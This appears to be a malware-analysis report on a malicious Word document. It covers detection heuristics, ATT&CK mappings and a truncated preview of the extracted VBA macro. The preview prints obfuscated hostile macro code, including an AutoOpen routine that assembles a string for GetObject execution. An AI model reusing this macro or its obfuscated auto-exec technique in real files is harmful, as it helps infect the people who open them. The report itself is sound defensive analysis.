MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This subroutine is designed to execute arbitrary code, likely to download and run a second-stage payload. The presence of the AutoOpen macro and the GetObject call strongly indicate malicious intent, aligning with the 'Spearphishing Attachment' initial access technique.
Heuristics 7
-
ClamAV: Doc.Malware.Generic-6666849-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6666849-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 51484 bytes |
SHA-256: f463d9565277f26af533f7dd403ae7398a3a4305afda9a9fa09d29545936a184 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub vAFYCOQOxYFEfoREloWAjI()
Dim RUvEGeKuvojOqaHOQ
For RUvEGeKuvojOqaHOQ = 4 To 12
Dim WogUiELYluRUh
WogUiELYluRUh = Fix(1131)
Next
lIpunEcOgUJOCakyvIRot = InStr("aYiOnUbyxIwoJeJAZYmE", "aYiOnUbyxIwoJeJAZYmEaYiOnUbyxIwoJeJAZYmE")
FAlAZoRyayTFiVZ = 15321
Dim PzAqBELuXanAhI
For PzAqBELuXanAhI = 3 To 13
Dim deGApyDOKYteJAVYZaBobej
deGApyDOKYteJAVYZaBobej = Fix(7188)
Next
Dim rudAluqAFaMyjIJU
For rudAluqAFaMyjIJU = 5 To 10
Dim zeseKYaezevELy
zeseKYaezevELy = Fix(99113)
Next
loiYDaFlOKA = 12764
End Sub
Sub AutoOpen()
Dim paXurACIZiJYZo
paXurACIZiJYZo = Log(3)
paXurACIZiJYZo = paXurACIZiJYZo + Log(11)
QDUmOlySod = Val("40571.3") & "zeRAnaGOaaD"
On Error Resume Next
Dim CEdiDAGulojASo
For CEdiDAGulojASo = 3 To 10
Dim RATOwECofaaO
RATOwECofaaO = Fix(63828)
Next
QObesUZUWEVY = InStr("qOBepOgAjUtYNIPAh", "qOBepOgAjUtYNIPAhqOBepOgAjUtYNIPAh")
Dim xapekakYvIDYvofoM
Dim hPonAToVunOpIPuQO
hPonAToVunOpIPuQO = Log(5)
hPonAToVunOpIPuQO = hPonAToVunOpIPuQO + Log(13)
Debug.Print "CuNoGeLiNeZrEmIVOcAd"
xapekakYvIDYvofoM = Log(1)
xapekakYvIDYvofoM = xapekakYvIDYvofoM + Log(11)
Debug.Print "VACIQiBeiAqoDUiotOqiwUNU"
Dim toNOnyGopgOlyHYpidywO
For toNOnyGopgOlyHYpidywO = 8 To 10
Dim VuDIitIFOP
VuDIitIFOP = Fix(86172)
Next
Dim PydAXeaOwAwOMeF
For PydAXeaOwAwOMeF = 6 To 13
Dim xoHazelEDaliBa
For xoHazelEDaliBa = 5 To 13
Dim TXIfEJuFOSAKudIByWfAm
TXIfEJuFOSAKudIByWfAm = Fix(54271)
Next
FAiIQITOJYRAtYzesedoaIQa = InStr("fOOQoRoxuTS", "fOOQoRoxuTSfOOQoRoxuTS")
Dim hYBIperoGaRefyha
Dim BoJybOmahUNYQ
For BoJybOmahUNYQ = 2 To 13
Dim juruTEGUTKi
juruTEGUTKi = Fix(4823)
Next
Dim jaairEQEzoPxE
jaairEQEzoPxE = Rnd(138)
If jaairEQEzoPxE > 85902 Then
jaairEQEzoPxE = Exp(8)
End If
hYBIperoGaRefyha = Fix(35157)
Next
Dim ieioNaJtTYfYgYW
ieioNaJtTYfYgYW = Rnd(119)
If ieioNaJtTYfYgYW > 21140 Then
ieioNaJtTYfYgYW = Exp(9)
End If
Dim wiJuxiCmeLeveiUgYaJI
For wiJuxiCmeLeveiUgYaJI = 2 To 11
Dim yLazoMUBUmAJIkExGAViCO
yLazoMUBUmAJIkExGAViCO = Fix(51354)
Next
Debug.Print "JIJEjeFUzySueZO"
Dim tANAZiDNUguauteTuca
Debug.Print "KEbYpyiedYF"
DilIDruMAfAXUxOKuQAsop = Val("77149.4") & "mytItajuKAWEnefEcA"
For tANAZiDNUguauteTuca = 3 To 11
hEGOpyZOlAzEWorYv = Val("54294.9") & "GywIDeCEaIsoBi"
Debug.Print "pyCiByTAXIsokyRYW"
Dim rAxeDoFOgaqunF
Dim SeRbUSeqIrofyKIqi
For SeRbUSeqIrofyKIqi = 10 To 11
Dim mEaYNUAloLYSYZe
mEaYNUAloLYSYZe = Fix(32912)
Next
rAxeDoFOgaqunF = Fix(21906)
Dim dUwUvUbYLagErujePio
dUwUvUbYLagErujePio = Log(6)
dUwUvUbYLagErujePio = dUwUvUbYLagErujePio + Log(12)
Next
QuqoRRotTuCUR = InStr("GekUQUMENeqaP", "GekUQUMENeqaPGekUQUMENeqaP")
Dim LeFYJepIwalEJInRuNexO
LeFYJepIwalEJInRuNexO = Rnd(1210)
If LeFYJepIwalEJInRuNexO > 30299 Then
LeFYJepIwalEJInRuNexO = Exp(10)
End If
diTUvaMiNelAtew = ""
Dim junoQAVomOjoGyRUZ
junoQAVomOjoGyRUZ = Log(6)
junoQAVomOjoGyRUZ = junoQAVomOjoGyRUZ + Log(11)
Debug.Print "bOxyJOZYlIxAxidvAsiH"
rDIvGOiunAVuBYH = Val("78447.2") & "ExOqIneqYtotiwUZuMIfuTi"
vEtOPEwoZYRaN = 1924
Debug.Print "GARUPuWEVaFOMaikETObA"
fyFIaekiDezYHYleMObYXyp = Val("66192.5") & "DYZVuaEdotUwEjvuvoly"
Dim ledHiiTat
ledHiiTat = Rnd(123)
If ledHiiTat > 10914 Then
ledHiiTat = Exp(3)
End If
ceQaTATAsynONeByxzOaE = InStr("cIRatbizInYqoHUj", "cIRatbizInYqoHUjcIRatbizInYqoHUj")
diTUvaMiNelAtew = diTUvaMiNelAtew + IIf((287 + 574) = 861, "sc", "fU")
Dim wivoPaGyXUBeLoxoseHe
wivoPaGyXUBeLoxoseHe = Log(9)
wivoPaGyXUBeLoxoseHe = wivoPaGyXUBeLoxoseHe + Log(12)
vLyCewipyiUnYXEko = 59150
jUPIGikEWODy = Val("76014.10") & "KKxEaufOniYbkoi"
CyLusekymaaiwAtone = InStr("jYRujiruKiNunuMUjoH", "jYRujiruKiNunuMUjoHjYRujiruKiNunuMUjoH")
Dim VIsEREfeZYPgeayRsAmE
VIsEREfeZYP
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.